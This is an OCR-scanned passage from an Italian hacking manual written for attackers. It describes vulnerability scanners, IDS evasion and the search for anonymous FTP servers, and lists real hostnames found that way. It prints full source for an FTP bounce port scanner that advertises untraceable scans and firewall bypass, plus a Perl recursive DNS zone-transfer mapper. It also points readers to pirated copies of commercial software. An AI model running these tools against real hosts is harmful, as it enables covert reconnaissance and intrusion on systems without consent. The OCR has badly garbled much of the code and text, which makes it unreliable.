case WSAEALREADY : 

printf(" Fall (WSAEALREADY) \n ") ; 
break; 

case WSAEADDRNOTAVAIL : 

printf( " Fall (WSAEADDRNOTAVAIL) \n ") ; 
break; 
case WSAEAFNOSUPPORT : 

printf( " Fall (WSAEAFNOSUPPORT) \n ") ; 
break; 
case WSAECONNREFUSED : 

printff " Fall (WSAECONNREFUSED) \n ") ; 
break; 

case WSAEFAULT: 

printf(" Fall (WSAEFAULT) \n" ) ; 
break; 

case WSAEINVAL : 

printf(" Fall (WSAEINVAL) \n" ) ; 
break; 

case WSAEISCONN: 

printf( " Fall (WSAEISCONN) \n ") ; 
break; 
case WSAENETUNREACH : 

printf( " Fall (WSAENETUNREACH) \n ") ; 
break; 

case WSAENOBUFS: 

printf( " Fall (WSAENOBUFS) \n ") ; 
break; 
case WSAENOTSOCK: 

printf( " Fall (WSAENOTSOCK) \n ") ; 
break; 
case WSAETIMEDOUT : 

printf( " Fall (WSAETIMEDOUT) \n ") ; 
break; 
case WSAEWOULDBLOCK : 

printf( " Fall (WSAEWOULDBLOCK) \n ") ; 
break; 

case WSAEACCES: 

printf( " Fall (WSAEACCES) \n ") ; 
break; 

default : 

printf(" Fall (%d) \n", tstResult) ; 
break; 

} 

} 

startPort++; 

} 
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Tutte queste funzionalità viste fino ad ora e individuate mediante l'uso di diversi software 
possono anche essere individuate da certi analizzatori di security come ad esempio RETINA 
anche se poi non è necessario arrivare ad utilizzare questi pacchetti solo per avere queste 
informazioni. 

Nel caso di FTP esiste una scanner che esegue questo tipo di test. 

In pratica assegnato un range di Ip il programma li passa ad uno ad uno cercando di eseguire 
il login mediante l'utente anonymous e usando come password un indirizzo di email. 
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Fino ad ora abbiamo visto due concetti fondamentali. 

Inizialmente parlando delle cose che l'hacker deve portare avanti c'e' l'identificazione dei 
sistemi operativi e dei softwares legati alla gestiuone dei servers in modo tale da poter 
successivamente andare a ricercare all'interno dei vari database di exploits presenti in rete, 
quelli che si addicono maggiormante alla situazione individuata. 
RETINA fa tutto questo e di più. 

All'interno del software creato dalla EEYE ci sono quattro funzionalità separate e 
precisamente : 

BROWSER 

MINER 

SCANNER 



Il tracer e il browser sono quelli che tutti conosciamo e quindi non c'è neppure da discutere 
sulle loro funzionalità. 

Le due funzioni interessanti sono ivece le altre due. 
Lo scanner è veramente completo. 

Il pacchetto mette in analisi l'host specificato identificando, nel imite del possibile, tutte le 
porte aperte e i software che girano su queste. 
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Una volta identificate queste cose RETINA cerca di identificarne le versioni in modo da 
individuare all'interno del suo database di BUGS quelli che possono essere i punti critici di 
questi. 

Questi problemi vengono mostrati mediante un scala che ne definisce la gravità. 

Lo scopo fondamentale di questo software, per altro costosissimo, sarebbe indicato ai 

sysadmin ma viste le sue funzioni anche l'hacker non può sottovalutarne le funzionalità. 

Chiaramente se facessimo un discorso in base al suo costo potremmo tranquillamente 

scartare la seconda classe di utenti in quanto penso che ben difficilmente un hacker vada a 

spendere diversi milioni per un programma indirizzato a trovare i bugs di un server. 

Chiaramente in rete dobbiamo considerare la presenza di astalavista.box.sk per cui la 

versione dimostrativa più astalavista ed ecco il software a misura di hacker. 

Come potete vedere dall'immagine che segue la gravità vine ne identificata da una serie di 

treccie di colori che tendono, maggiore è la gravità, al rosso. 
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La seconda funzionalità di RETINA è quello definito con il termine di MINER. 
In pratica nei capitoli legati all'hackeraggio dei siti WEB abbiamo visto come determinati 
problemi possono essere dipendenti da stringhe usate dall'attaccante per cercare di indurre i 
browser o i software ad avere comportamenti anomali. 

Il miner cerca di eseguire un numero elevatissimo, si parla di più di 6000, di metodi indirizzati 
al WEB Server o agli altri software che girano sulla macchina. 

Vengono testati i CGIBIN, i vari bugs come UNICODE, quelli legati a MSADC e cosi via. 
Chiaramente RETINA costituisce, viste le funzionalità di cui dispone, di un ottimo punto 
d'inizio per vedere successivamente come muoversi sul sistema preso di mira. 
Chiaramente i tentativi vengono logati sul sistema remoto per cui il sysadmin dopo l'uso di 
retina si roverà un log spaventoso con migliaia di tentativi di forzatura. 
La cosa fantatstica di retina è che quando individua un problema nella finestra in basso 
presenta la spiegazione verbosa del problema fornito con tanto di LINK ai sistemi dove è 
possibile leggere i dettagli ed eventualmente prendere in visione [exploit adatto per verificare 
il bug. 

Sul mrecato esistono diversi altri pacchetti che possono essere visti dali due lati e 
precsimante quello del sysadmin e quello dell'hacker. 

Dicevamo che retina è costosissimo per cui spesso in mano ai sistemisti troviamo altri 
software che vengono distribuiti a prezzi molto più bassi se non di public domain e quindi 
gratuiti. 

Alcuni di questi analizzatori di sicurezza sono in ambiente Linux come ad esempio SATAN. 

Questo pacchetto è uno dei classici ed è sicuramente uno di quelli più utilizzati. 

Questo pacchetto deve essere valutato attentamente in quanto essendo di quelli che 

circolano con tanto di sorgenti, spesso è stato trovato con i codici alterati. 

Nal 1995 un ragazzo dell'università di Tempie alterò i codici di SATAN inserendo dentro al 

modulo fping.c una backdoor che permetteva di accedere ai sistemi che lo avevano utilizzato. 

In ogni caso a questo pacchetto sideve attribuire il merito di aver costituito un punto di svolta 

nell'ambito degli analizzatori. 

Satan è in grado di cercare i punti deboli nelle seguenti aree: 

1 . Protocollo di trasferimento FTP 

2. Network File System (NFS) 

3. Password del servizio informativo di rete (NIS) 

4. Accesso alla shell remota 

5. Sistema di accesso rexd 
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8. La sicurezza del server X 

Sempre in ree esistono altri analizzatori come ad esempio MAS (Internet Security Scanner) 
fornito anche in versione dimostrativa all'interno del TOOLKIT di Windows. 
Unb altro nome venuto a galla in questi ultimi anni è SAINT. 
Sempre della stessa famiglia c'è Nessus. 

Un programma invece presente in sorgente peri è Whisker il quale dispone di un grosso 
numero di test, molti messi in circolazione da terze parti ovvero da utenti del pacchetto. 
WHISKER di fatto è un analizzatore di security legato ad uno di quelli che sono I maggiori 
problemi di un WEB ovvero le CGI-BIN. 

Come negli altri casi il pacchetto dispone di un grosso archivio di test ce vengono eseguiti sui 
sistemi vittima. 

In questo settore WHISKER è sicuramente il miglior CGI Scanner esistente contenente 
almeno 500 test indirizzati alle CGI, ASP ecc. 

WHISKER supporta il metodo dei WEB Virtuali, quelli che usano lo stesso IP ma che 
vengono identificati tramite il www.nome.dom passato da HTTP 1 .0. 

Il pacchetto cerca inoltre di evadere I sistemi IDS cambiando il formato delle richieste che 
vengono inviate. 

Nei capitoli successivi vedremo I sistemi IDS ma adesso possiamo solo accennare che questi 
di fatto identificano le intrusioni analizzando I pacchetti che arrivano su di un sistema 
confrontando il contenuto con dei dati presenti dentro ad un database in cui sono memorizzati 
gli identificatori degli attacchi. 

Quandoviene richiesto un CGI ad un WEB server, il browser invia una richiesta HTTP sulla 
rete con il seguente formato : 



GET /cgi-bin/broken.cgi HTTP/1 .0 

Questa richiesta implementa un metodo HTTP GET, ilo quale cerca di attivare il programma 
broken.cgi, nella direcory CGI-BIN, usando il protocollo http v1 .0 

Uno scanner di sicurezza invia centinaia di altre richieste relative a CGI alla ricerca di 
vulnerabilità conosciute. 

Il sistema IDS invece analizza tutti il traffico che attraversa la rete alla ricerca di un 
identificatore che permetta di vedere la richiesta della vulneribilità. 

WHISKER manipola tale richiesta in modo tale che questa non corrisponda esattamente a 
quello che si aspetta 

WHISKER funziona a livello di applicazione (ricordatevi i layer delle reti) alterando il modo 
con cui le richieste http appaino. 

Infatti WHISKER contiene 10 metodi capaci di alterare le richieste http. 

Ad ogni modo rinviamo ai capitoli legati all'evasione dai sistemi IDS un ulteriore 

approfondimento su certi metodi. 

Tra i software visto precedentemente avevamo saltato uno e precsisamente di quello che 
segue. 

Come abbiamo detto nella parte introduttiva di questo capitolo, l'individuazione dei sistemi è il 
punto iniziale da cui si parte alla ricerca di altre caratteristiche. 

Le funzioni di PING servono a individuare la presenza di un determinato host, in grado di 
rispondere alle interrogazioni fatte tramite il protocollo ICMP. 

L'uso degli scanner invece sono indirizzati a identificare le porte attive su un certo IP anche 
se poi l'individuazione di altre funzionalità devono essere eseguite mediante varianti di questi 
tipi di softwares. 

Supponiamo di voler identificare dei sistemi che abbiano attivi dei servers FTP con tanto di 
accesso anonimo attivato su questi. 

In questo caso oltre ad individuare la porta aperta il software dovrà provare di eseguire il login 
usando anonymous come utente per l'accesso. 
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Un esempio di canner FTP è quello che segue. 



/* 

* FTP Scan (C) 1996 Kit Knox <kit@connectnet . com> 
* 




* Exploits bug in FTP protocol that allows user to connect 

* IP address and port . 
* 


to arbritary 


* Features: Untraceable port scans. Bypass firewalls! 
* 




* Example usage: 
* 




* ftp-scan ftp.cdrom.com 127.0.0.1 0 1024 
* 




* This will scan IP 127.0.0.1 from ftp.cdrom.com from port 
* 


0 to 1024 


*/ 




iinclude <stdio.h> 
iinclude <stdlib.h> 
^include <sys/param.h> 
iinclude <sys/socket . h> 
iinclude <netinet/in . h> 
iinclude <netdb.h> 
iinclude <stdarg.h> 




int sock; 

char line [1024] ; 




void rconnect (char *server) 
{ 

struct sockaddr__in sin; 
struct hostent *hp; 






hp = gethostbyname ( server) ; 
if (hp==NULL) { 

printf ( "Unknown host : %s\n" , server) ; 

exit (0) ; 

} 

bzero ( (char*) &sin, sizeof (sin) ) ; 

bcopy (hp—>h addr , (char *) Ssin . sin addr, hp->h length) ; 

sin . sin^family = hp—>h addrtype ; 

sin . sin__port = htons (21) ; 

sock = socket (AF_INET, SOCK_STREAM, 0) ; 

connect (sock, (struct sockaddr *) &sin, sizeof (sin) ) ; 

} 






void login(void) 




{ 

char buf [1024]; 
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send(sock, buf, strlen (buf) , 0) ; 
sleep(l) ; 

sprint f (buf, "PASS user@\n") ; 
sendfsock, buf, strlen (buf ), 0) ; 



void readln (void) 
{ 

int i,done=0,w; 
char tmp [1] ; 

sprint ffline, "") ; 
i = 0; 

while (ìdone) { 

w=read(sock, tmp, 1, 0) ; 
if (tmp[0] != 0) { 
line[i] = tmp[0] ; 

} 

if (line[i] == '\n') { 
done = 1; 

ì 

i++; 

} 

line[i] = 0; 



void sendln(char s[1024]) { 
sendfsock, s, strlen (s) , 0) ; 

} 

idefine OC (b) ( ( (int)b) &Oxff) 

void main (int argo, char **argv) 
{ 

char buf [1024]; 
int i; 

u short sport, eport; 
register char *p, *a; 
struct hostent *hp; 
struct sockaddr_in sin; 
char adr[1024]; 

if (argc != 5) { 

printf ("usage: ftp-scan ftp_server scan_host loport hiport\n") ; 
exit (-1) ; 

} 

hp = gethostbyname (argv[2] ) ; 
if (hp==NULL) { 

printf ( "Unknown host: %s\n" , argv [2] ) ; 

exit (0) ; 

} 

bzero ( (char*) &sin, sizeof (sin) ) ; 

bcopy (hp—>h addr, (char *) Ssin.sin addr, hp->h length) ; 

rconnect (argv[l ] ) ; 

/* Login anon to server */ 

login () ; 

/* Make sure we are in */ 
for (i=0; i<200; i++) ( 
readln () ; 

if (strstr (line, "230 Guest")) { 
printf ( "%s ", line) ; 
i = 200; 

} 

} 

a= ( char *) Ssin . sin_addr; 
sport = atoi (argv[3] ) ; 
eport = atoi (argv [4 ] ) ; 

sprint f (adr, "%i, %i, %i, %i" , UC (a [0] ) , UC (a [1] ) , UC (a [2]), UC(a[3])) ; 
for (i=sport ; i<eport; i++) { 

sin.sin port = htons (i) ; 

p= (char *) Ssin . sin_port ; 

sprintffbuf, "\nPORT %s, %i, %i\nLIST\n", adr, UC(p[0]) , UC(p[l])) ; 
sendln (buf) ; 
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readln () ; 

} 

if (strstr (line, "150") ) { 

printf("%i connected.\n", i) ; 

} 



} 

dose (sock) ; 

ì 




Gli scanner visti precedentemente legati all'identificazione di sistemi con l'utente anonymous 
abilitato eseguivano lo scannino partendo da un range di IP. 
Un pacchetto particolare che invece interroga un motore di ricerca per un particolare 
argomento ed in base alla risposte ricerca quali sistemi dispongono di un sitsema FTP è il 
seguente : 




Il programma si chiama FTP SEARCH. 
Il risultato è una lista del tipo : 

tivo.samba.org 

www.chass.utoronto.ca 

www.cleo-and-nacho.com 

www.cs.berkeley.edu 

www.kernelhacking.org 

www.nomad.ee 

www.obn.org 

www.rdrop.com 

www.realityhacking.com 

www.seattlerobotics.org 

www.spectre-press.com 

www.underground-book.com 

Un utility veramente ben fatta, multifunzionale, è SAM SPADE. 
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Il programma è prelevabile da www.samspade.com ed è costituito da diverse Utilities. 
A mio modesto avviso il programma è ben strutturato ed in particolar modo utilizza in modo 
intelligente il sistema di Windows per la visualizzazione delle informazioni derivate dallanalisi. 
Visual Studio permette la creazione di programmi utilizzanti diverse metodologie di gestione 
del video. 

Quella definita MULTIVISTA è di fatto quella adottata dal SAM SPADE. 

Qualsiasi utility utilizza come standard di output lo sfondOo di una finestra aperta in quella 

principale. 

I programmi o meglio le funzionalità interne a SAM SPADE sono : 

1 . PING. Il programma invia i classici ICMP Echo Request. 

2. WHOIS. Il sistema possiede una sua intelligenza che utilizza nella scelta del sistema cui 
inviare la richiesta whois. 

3. IP BLOCK WHOIS. La richiesta dell'IP viene inviata al database ARIN. 

4. NSLOOKUP. Server a risolvere le informazioni legate al DNS 

5. DIG. Anche questa funzone è orientata ad ottenere informazioni DNS su un certo 
dominio. 

6. DNS ZONE RANSFER. Esegue il trasferimento dei dati DNS da un server al nameserver 
specificato. 

7. TRACEROUTE. La classica funzione di tracciamento. 

8. SMTP VRFY. Verifica un determinato indirizzo SMTP. 

9. WEB BROWSER. E' il suo browser internosolo che viene mostrato in modo RAW il 
sorgente HTML. 

Oltre a queste funzioni principali SAM SPADE ne possiede altre molto utili per quanto 
riguarda l'enumerazione dei sistemi. 

Nei vari capitoli legati all'analisi che dovrebbe essere condotta abbiamo visto che gli obbiettivi 
da identificare potrebbero essere diversi a partire dal sistema operativo per arrivare alle varie 
caratteristiche come ad esempio la possibilità di eseguire delle nuli session e cosi via. 
Alcune utility comprendono tutte queste funzionalità: 
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L'immagine precedente è quella di WINFINGERPRINTING. 

Come potete vedere dalle varie opzioni selezionabili è possibile richiedere diversi tipi di 
analisi su un intetro range di IP. 

Sempre nell'ambito delle funzioni di scanning uno dei sorgenti che è possibile utilizzare per 
eseguire quello di un intero dominio, è quelo che segue, scritto in peri e utilizzabile sotto 
LINUX. 



# .' /usr/bln/perl 
# 

# nscan 
# 

## 



use Getopt : : Long ; 

use POSIX qw(strftime) ; 

use Time: : Locai; 

use FindBin qw[$Bin] ; 

$host = "/usr/bin/host"; 

# the core of our program 



sub domainlist { 
my $domain; 
my Qpresorted; 
my Qoutput; 
my $pid; 



($domain) = @_; 

exitelean ("Could not fork! : $!") unless defined ($pid = 
open (HOSTPROC, "-/")); 

if ($pid) # parent process 
{ 

while (<HOSTPROC>) 
{ 

if (/ (\w*\.$domain) /) 
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push @presorted, lc($l) ; 

} 

} 

dose (HOSTPROC) or debugprint ( "Chlld process exited with: 

$?"); 

} else { # chlld process 

exec ($host, "-1" , "-a" , $domain) or exitclean ("Could not execute 
$host: $!"); 
} 

Qpresorted = sort Qpresorted; 
$prev= 'noprevyet ' ; 

@ output =grep ($_ ne $prev SS ($prev = $_) , Qpresorted) ; 
return @output; 



# signal catching 
sub sig_catch { 

my $signame = shift; 

print "\nRecieved SIG$signame, exiting. . . \n"; 
exit 2; 



# our alternative to 'die ' 
sub exitclean { 

my ($msg) = @_; 

print "$msg\n" ; 

exit 2; 



# show program usage 
sub usage { 

print "Usage: $0 [options] -t <domain>\n" ; 

print " \noptions : \n" ; 

print "\t-t <target domain> — the domain you want to scan. \n"; 

print "\t-d [directory] — directory to put domain maps . \n"; 

print "\t-debug — show debug Information. \n"; 
print 
exit 2; 



sub debugprint { 
($msg) = @_; 

print "[debug] $msg\n" unless ( ! $debug) ; 

ì 
# 

# Start the main program 
# 

$SIG{INT}=\Ssig_catch; 
$start_time = time; 
SGetOptions ( "debug", \$debug, 

"t:s", \$target, 

"d: s ", \$directory) ; 

# make sure ali of our input is ok 
if ($target eq "") { usage (); } 

if ($directory eq "") { 
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prlntf("No output directory defined, using '$Bin' !\n") ; 
$directory=$Bin; 
} else { 

if (-d $directory) { 
printf ("Using directory: %s \n" , $directory) ; 
} else { 
if (mkdir ($directory, 0755) ) { 
printf ( "Created output directory : %s \n ", $directory) ; 
} else { 

exitclean ("Could not create output directory! : $!"); 

} 

} 



chdir ($directory) Il exitclean ( "Could not change to output directory: 
$!"); 

%master = () ; 
$level++; 
$count = 0; 

$target = le ($target) ; 

print "TARGET = $target . dom\n" unless -e "$target . dom" ; 
if (-e "$target.dom") { 

printf ("There is a domain file for the domain ' %s ' \n" , $target) ; 

open (DOM, "<$target. dom") Il exitclean ("Could not open domain file: 

$!"); 

while ($host= (<DOM>) ) { 
chomp ($host) ; 
push @ target s, $host; 

} 

$master { $target } = Qtargets; 
dose (DOM) ; 

printf ("Loaded %d hosts from $target . dom\n" , scalar (@targets) ) ; 
@targets = () ; 
} else { 

printf ("Creating initial domain list for: %s \n" , $target) ; 
$master { $target } = [ (domainlist ($target) ) ] ; 

@targets = () ; 

Qtargets = @{$master{$target} } ; 
open (DOM, "»$target.dom") Il 

die ("Couldnt create domain map for top domain: $!"); 

foreach $t (Qtargets) { print DOM "$t\n"; } 
dose (DOM) ; 

} 

debugprint ( " [ — starting recursive zone transfers — ] ") ; 
$oldcount = 1; 

while ($oldcount ne $count) { 
$oldcount = $count; 
foreach $key (keys (%master) ) { 
Qtargets = () ; 

Qtargets = @($master($key} } ; 

debugprint (scalar (Qtargets) . " targets in domain $key"); 
foreach $t (Qtargets) { 
if ($master{$t) eq "") { 

debugprint (" [$count] — scanning $t") ; 

$master{$t} = [ (domainlist ($t) )] ; 
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$count++; 

# save domain file 
Qhosts = () ; 

@hosts = @{$master{$t} } ; 
if (scalar (@hosts) != 0) 
{ 

open (DOM, "»$t . dom ") Il die "Cant open $t.dom for writing: $!"; 
debugprint (" [$count] — writing domain file for $t ") ; 
foreach $host (@hosts) 
{ 

print DOM "$host\n"; 

} 

dose (DOM) ; 

} 

# end save domain file 

} 

} 

} 

ì 

# create our domain maps 

foreach $key (keys (%master) ) { 
@targets = () ; 

Qtargets = @{$master{$key} } ; 
if (scalar (gtargets) != 0) 
{ 

open (MAP, "»$key . dom ") / / 

exitclean ("Could not create output file '$key.dom' : $!"); 

foreach $host (@targets) { print MAP "$host\n"; } 

dose (MAP) Il debugprint ("Could not dose file '$key.dom': $!"); 




All'inizio vi avevo detto di non perdervi all'interno dei vari sorgenti in quanto le funzioni di base 
sono sempre le stesse ovvero quelle due o tre funzioni che devono essere usate per aprire 
un socket di comunicazione. 

Anche se i sorgenti a cui ci riferiamo sono scritti in PERL, le funzionalità rchieste dai 
programmi sono sempre le stesse. 

In casi invece come quello precedente alcune funzioni possono essere richieste eseguendo 
deiole chiamate al sistema operativo. 
Un esempio è : 

exec ($host, "-1" , "-a" , $domain) or exitclean ("Could not execute 

L'output in molti casi viene reindirizato su files e successivamente mediante Utilities Unix 
possono essere fatte ricerche o manipolazioni. 

L'hardware 

Per riuscire a comprendere a fondo l'ambiente che spesso vi troverete davanti è necessario 
dedicare un po' di tempo alla descrizione di quelli che possono essere gli ambienti 
professionali. 

Spesso viene complicato farsi un idea in quanto non tutti dispongono della possibilità di avere 
a che fare con qualche società che gestisca servers internet per cui la visione spesso è 
limitata a quelli che sono i dispositivi usati per le connettività domestica. 
In genere da casa la connessione alla rete viene eseguita tramite un Internet Provider con 
accesso di tipo a modem. 
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Le velocità di connessione negli ultimi anni sono notevolmente aumentate grazie alla 

commercializzazione da parte delle società di telefonia di quelle che sono le linee adsl le quali 

a confronto di quelle modem normali possiedono decine di volte la loro velocità. 

In ogni caso il centro professionale non si distingue solo per questioni di linea anche se di 

fatto questa possiede la sua importanza in quanto generalmente un sistema professionale ha 

come connettività delle linee la cui velocità supera spesso i 2 MB. 

Partiamo da quelle che sono le esigenze di un sistema professionale. 

Per partire dall'hardware è necessario considerare una di quelle che sono le caratteristiche 

fondamentali ovvero la sicurezza legata alla continuità di servizio dovuti a problemi di tipo 

hardware. 

Le macchine che gestiscono i vari servers in genere sono sistemi dotati di caratteristiche che 
garantiscono affidabilità e velocità. 

I processori possono variare da quelli Xeon, come nel caso di servers COMPAQ della serie 
PROLIANT ad altri come quelli adottati dalle stazioni SUN. 

I dischi devono garantire accessi veloci per cui la tecnologia SCSI III è una delle più diffuse 
spesso in configurazioni RAID. 

La garanzia contro ai blocchi hardware delle macchine può essere migliorata notevolmente 
dal fatto di adottare soluzioni di cluster. 

In altre parole due o più sistemi vengono collegati tramite una determinata tecnologia che è 
appunto quella del cluster mediante la quale ogni sistema è sempre pronto a prendersi come 
carico il lavoro dell'altro. 

Esistono diverse configurazioni di questo tipo anche se quella più flessibile è sicuramente la 
NULL SHARED. 

Questa permette di avere l'indipendenza di ciascun sistema anche se di fatto uno è sempre 
pronto a sostituirsi all'altro in caso di guasto. 

In questo caso i dischi non sono condivisi anche se le risorse dell'uno possono passare sotto 
il controllo dell'altro ma in ogni caso in tempi separati. 

Windows gestisce questa tecnologia tramite le versioni Advanced Server come ad esempio in 
Windows 2000 e in Whistler. 

La memoria di questi sistemi non di rado supera il GIGABYTE raggiungendone anche 4. 
Normalmente ogni sistema dispone di un certo numero di dischi che utilizza per scopi propri 
come ad esempio per tenerci il sistema operativo e altri dischi condivisi tra più macchine 
tramite tecnologie come appunto quella RAID. 

I dischi sono ad accesso molto veloce e d'altra parte questo è comprensibile in quanto non di 
rado i servers gestiscono centinaia di siti WEB. 

Un po' di tempo fa si era più propensi ad utilizzare meno servers ma più grossi mentre oggi 
non di rado vengono usati servers in rack meno potenti ma in numero maggiore come ad 
esempio nelle serie come quelle Cobalt Raq4, Compaq Proliant DL320 e cosi via. 
Questi servers speso dispongono di più interfaccie ciascuna delle quali è affacciata ad una 
determinata segmentazione di rete. 

In alcuni casi l'interfaccia gestisce IP pubblici rivolti verso il mondo internet, mentre in altri 
casi l'interfaccia è verso delle intranet aziendali con su dei sistemi destinati al controllo dei 
servers stessi. 

La creazione di zone a differenti livelli di sicurezza è eseguita tramite firewall hadware come 
quelli relativi alla serie CISCO PIX 515 i quali utilizzano algoritmi adattivi che gli permettono di 
raggiungere livelli di sicurezza non raggiungibili con sistemi software. 

Questi firewall spesso lavorano abbinati con i routers i quali sono i dispositivi hardware 
destinati alla gestione dell'instradamento dei pacchetti sulla rete. 

Esistono delle serie di regole legate al bloccaggio dei pacchetti che vengono settate usando 
delle funzioni abbinate router/firewall. 

Queste regole sono ad esempio come quelle che tendono a bloccare i pacchetti che riportano 
nella loro intestazione come mittente indirizzi di intranet pur provenendo da interfacce 
esterne. 

Chiaramente se un pacchetto proveniente dalla rete esterna riporta come indirizzo di mittente 
un indirizzo interno alla rete significa che il pacchetto è stato alterato per fingere di essere 
relativo ad un host considerato sicuro o garantito. 
In questo caso funzioni di filtraggio possono evitare il problema. 

Un altro sistema fondamentale di cui parleremo successivamente è di fatto il router il quale 
grazie a delle tabelle interne permette di scegliere quale strada fare prendere ai pacchetti di 
dati. 
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Questi sistemi possono essere acquistati dalla società oppure dati in gestione dalle 
compagnie telefoniche come ad esempio Interbusiness del gruppo Telecom la quale si 
interessa della connettività orientata agli ISP. 

I routers dispongono di linguaggi legati al loro sistema operativo i quali possono essere 
utilizzati per gestire determinate funzionalità tra cui, funzione importantissima, il filtraggio degli 
IP in ingresso ed in uscita. 

Le funzioni eseguite dagli hackers, con il passare del tempo sono diventati sempre più 
tecnologicamente avanzati e quindi sempre di più orientati a colpire questi sistemi di gestione. 
L'hacker ad alto livello utilizza bugs a livello software per riuscire ad assumere diritti elevati 
all'interno dei sistemi mentre quello che dispone delle conoscenze a livello di protocolli i suoi 
attacchi le porta sfruttando questo strato gestionale. 

Attenzione che parlo di strati differenti da quelli che sono definiti a livello di servizi di rete in 
quanto ij questo contesto il livello è tanto più basso quanto questo si avvicina all'hardware. 

I routers possiedono sistemi legati alla loro gestione remota e anche i firewalls possiedono in 
genere degli accessi telnet. 

La strutturazione di una rete viene eseguita anche mediante dei sistemi di collegamento delle 
varie entità che partecipano a questa alcuni adatti anche a creare segmentazioni differenti in 
uno stesso ambito fisico. 

Stiamo parlando di sistemi come gli SWITCH e gli HUB. 

Questi allo stesso modo dei routers possiedono spesso degli accessi remoti accessibili 
tramite funzioni telnet. 

Questo è il caso, ad esempio, degli SWITCH della CISCO i quali grazie ad un IP assegnatogli 
possono essere visti e controllati anche da sistemi fisicamente e geograficamente remoti. 
Chiaramente in questi casi esiste il problema delle password di default di cui abbiamo 
accennato. 

Spesso delle reti private utilizzano delle dorsali pubbliche per la loro connettività. 

Questa metodologia che permette la creazione di questi segmenti di rete sovrapposti 

fisicamente ad altri viene definita con il termine di VPN ovvero Virtual Private Network. 

In questi casi i dati viaggiano sui segmenti di rete in forma codificata in modo tale che solo i 

sistemi connessi a queste reti virtuali possano vedere le informazioni che vengono trasmesse 

su queste. 

Quando abbiamo di mezzo dei routers in genere questi servono anche ai sistemi collegati per 
la connessione ad Internet. 

All'interno dei settaggi dei vari sistemi relativi al protocollo TCP/IP l'indirizzo del router viene 
utilizzato come indirizzo di GATEWAY di default. 

Esistono anche sistemi software che permettono la condivisone di connessioni a reti esterne 
come appunto nel caso di internet e precisamente quelli che vengono definiti appunto con il 
termine di GATEWAY. 

Questi software particolari sono destinati a sparire in quanto le funzionalità di condivisione 
delle connessioni di rete sono sempre di più ritrovabili tra le funzioni già inserite dentro ai 
nuovi sistemi operativi. 

Le reti relative ad aziende molto grosse in genere sono composte da diverse intranet locali le 
quali tramite questi sistemi hardware possono essere collegati insieme e tramite funzioni di 
routing possono essere stabiliti dei tragitti che i pacchetti devono seguire per passare da una 
rete con un certo numero ad un'altra diversa. 

Le problematiche relative alla sicurezza sono presenti anche in questi tipi di reti in quanto gli 
attacchi potrebbero provenire anche da segmenti interni all'azienda e non solo dall'esterno. 

II lavoro dell'esperto di sicurezza diventa ogni giorno sempre più complesso in quanto anche 
le tecnologie viaggiano sempre di più verso una complessità tecnica e logica. 
Sicuramente a stessa tecnologia fornisce sempre di più meccanismi con potenzialità 
elevatissime anche se di fatto ad una maggiore potenzialità potrebbe corrispondere una 
maggiore complessità. 

I firewalls di cui abbiamo parlato esistono sia a livello software che a livello hardware. 

E' facilmente comprensibile quali possano essere i problemi legati all'attività svolta da un 

firewall. 

Quelli più semplici svolgono una funzione banale ovvero prendono ogni pacchetto che passa 
su una determinata interfaccia e dopo averlo analizzato confrontano gli indirizzi marcati con 
quelli presenti in una tabella di regole di filtraggio permettendone o meno il passaggio. 
In altre parole questi sistemi applicano delle regole al passaggio dei pacchetti. 
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Sulle reti con un grosso flusso di pacchetti è chiaro che il lavoro che i firewall devono fare 
sono elevatissimi e quindi corrono il rischio di diminuire anche vistosamente le prestazioni 
della rete stessa. 

In questo caso sono preferibili firewall hardware in quanto questi dispongono di processori 

dedicati il cui lavoro da svolgere è soltanto quello che abbiamo appena detto. 

Il firewall hardware in ogni caso, grazie alla sua notevole velocità di processo, possono 

eseguire anche altri tipi di controlli come quelli legati alle tecniche di FLOOD. 

In softwarini che i navigatori internet sono abituati a vedere come per esempio ZoneAllarm o 

Backlce sono di una semplicità sconcertante. 

Alcuni firewall hardware come per esempio i CISCO, possiedono dei manuali molto vasti 
composti da centinaia di comandi mediante i quali possono essere creati i programmi di 
gestione di questi. 

Il programma dovrà, tenendo in considerazione la realtà in cui vengono inseriti questi, 
adeguare le funzionalità del sistema a quello della realtà. 

Ultimamente case come Microsoft hanno rilasciato firewall software con prestazioni e livelli di 
sicurezza molto maggiori rispetto a quali che si era abituati a trovare in giro. 
La scelta di adottare soluzioni software per la creazione di firewall ha sempre portato i 
system's administrator a scegliere LINUX come base per la gestione di rete in quanto questo 
grazie a funzionalità del suo KERNEL possiede funzioni altamente specializzate in merito. 
Linux infatti ha il comando IPCHAINS il quale viene utilizzato per la creazione dei sistemi di 
regole di filtraggio dei pacchetti. 

Spesso nell'ambito di sistemi professionali esiste anche la necessità di garantire la banda 
verso un determinato server. 

In questo caso sempre un sistema operativo come LINUX possiede la capacità di filtrare la 
banda che arriva tramite un interfaccia smistandola su altre interfacce in modo controllato. 
Una soluzione economica per i fornitori di servizi internet è appunto quella di utilizzare Linux 
sia per quello che riguarda il firewall che per quello che è relativo alla garanzia di banda 
passante. 

La presenza di queste funzionalità a livello di kernel ha fatto si che in Linux esistessero delle 
librerie particolari orientate alla gestione dei pacchetti a basso livello come ad esempio la 
libreria TCPDUMP, quella LIBNET e altre ancora. 

Altri sistemi particolari che possono entrare a fare parte della panoramica dei fornitori di 
servizi di rete sono alcuni che servono a controllare gli accessi. 

Generalmente almeno un sistema viene dedicato all'analisi delle funzioni di rete tra cui il 
controllo di banda, il monitoraggio delle funzioni e dei servizi attivi e grazie ad alcuni software, 
come ad esempio NFR, il controllo legato agli usi atipici della rete stessa. 

I softwares che fanno queste funzioni sono molti e le tecniche utilizzabili sono anche queste d 
numero elevatissimo. 

Spesso i funzionamento in collaborazione di certi programmi servono ad ovviare il fatto di 
non adottare certe soluzioni per altro costosissime. 

Un software come NFR pretende un sistema dedicato e quindi oltre al costo di questo è 
necessario mettere in conto cifre ce spesso superano i 20.000 €. 

Come in tutte le attività informatiche i sistemi per l'esecuzione dei backup svolgono una 
funzione fondamentale in quanto l'amministratore di rete ha di fatto il compito di gestire 
questo tipo di attività anche più volte al giorno. 

Chiaramente essendoci in gioco dimensioni legate ai dischi che possono essere anche molto 
grosse, i tempi sono quasi sempre molto lunghi se non vengono adottate metodologie come 
nel caso di backup differenziali o incrementali. 

Le operazione di analisi fatte dagli hacker dovrebbero nel limite del possibile identificare tutte 
le periferiche accessibili per poi poter provare tipi di exploits specifici. 

II primo passo da fare quando si identifica un IP specifico con su dei servizi interessanti è 
quello di vedere a chi questo IP è stato assegnato. 

Questo controllo deve essere fatto mediante la consultazione di uno dei tanti siti dove 
vengono riportate le liste degli IP assegnati. 

